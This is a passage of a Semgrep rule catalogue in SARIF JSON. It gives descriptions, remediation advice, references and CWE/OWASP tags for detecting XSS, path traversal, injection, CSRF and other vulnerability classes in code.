python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","id":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","name":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask","id":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","name":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-shelve-flask.tainted-shelve-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"helpUri":"https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","id":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","name":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.nosql-injection-servlets.nosql-injection-servlets"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"help":{"markdown":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions](https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions)\n","text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","id":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","name":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","id":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","name":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"help":{"markdown":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag)\n - [https://www.php.net/manual/en/language.basic-syntax.phptags.php](https://www.php.net/manual/en/language.basic-syntax.phptags.php)\n","text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","id":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","name":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"help":{"markdown":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization)\n - [https://github.com/mgholam/fastJSON#security-warning-update](https://github.com/mgholam/fastJSON#security-warning-update)\n","text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","id":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","name":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","id":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","name":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The code must not contain any of Unicode Direction Control Characters"},"help":{"markdown":"The code must not contain any of Unicode Direction Control Characters\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters)\n - [https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo](https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo)\n","text":"The code must not contain any of Unicode Direction Control Characters"},"helpUri":"https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters","id":"solidity.security.no-bidi-characters.no-bidi-characters","name":"solidity.security.no-bidi-characters.no-bidi-characters","properties":{"precision":"very-high","tags":["CWE-837: Improper Enforcement of a Single, Unique Action","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.no-bidi-characters.no-bidi-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","id":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","name":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"help":{"markdown":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2)\n","text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2","id":"python.lang.compatibility.python37.python37-compatibility-importlib2","name":"python.lang.compatibility.python37.python37-compatibility-importlib2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-importlib2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"help":{"markdown":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal)\n - [https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af](https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af)\n - [https://www.acunetix.com/websitesecurity/php-security-2/](https://www.acunetix.com/websitesecurity/php-security-2/)\n","text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal","id":"php.lang.security.tainted-path-traversal.tainted-path-traversal","name":"php.lang.security.tainted-path-traversal.tainted-path-traversal","properties":{"precision":"very-high","tags":["CWE-23: Relative Path Traversal","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-path-traversal.tainted-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSL verification disabled, this allows for MitM attacks"},"help":{"markdown":"SSL verification disabled, this allows for MitM attacks\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none)\n - [https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify](https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify)\n","text":"SSL verification disabled, this allows for MitM attacks"},"helpUri":"https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none","id":"rust.lang.security.ssl-verify-none.ssl-verify-none","name":"rust.lang.security.ssl-verify-none.ssl-verify-none","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.ssl-verify-none.ssl-verify-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"help":{"markdown":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms)\n","text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","id":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","name":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"help":{"markdown":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n","text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","id":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","name":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","id":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","name":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://github.com/gorilla/csrf](https://github.com/gorilla/csrf)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery 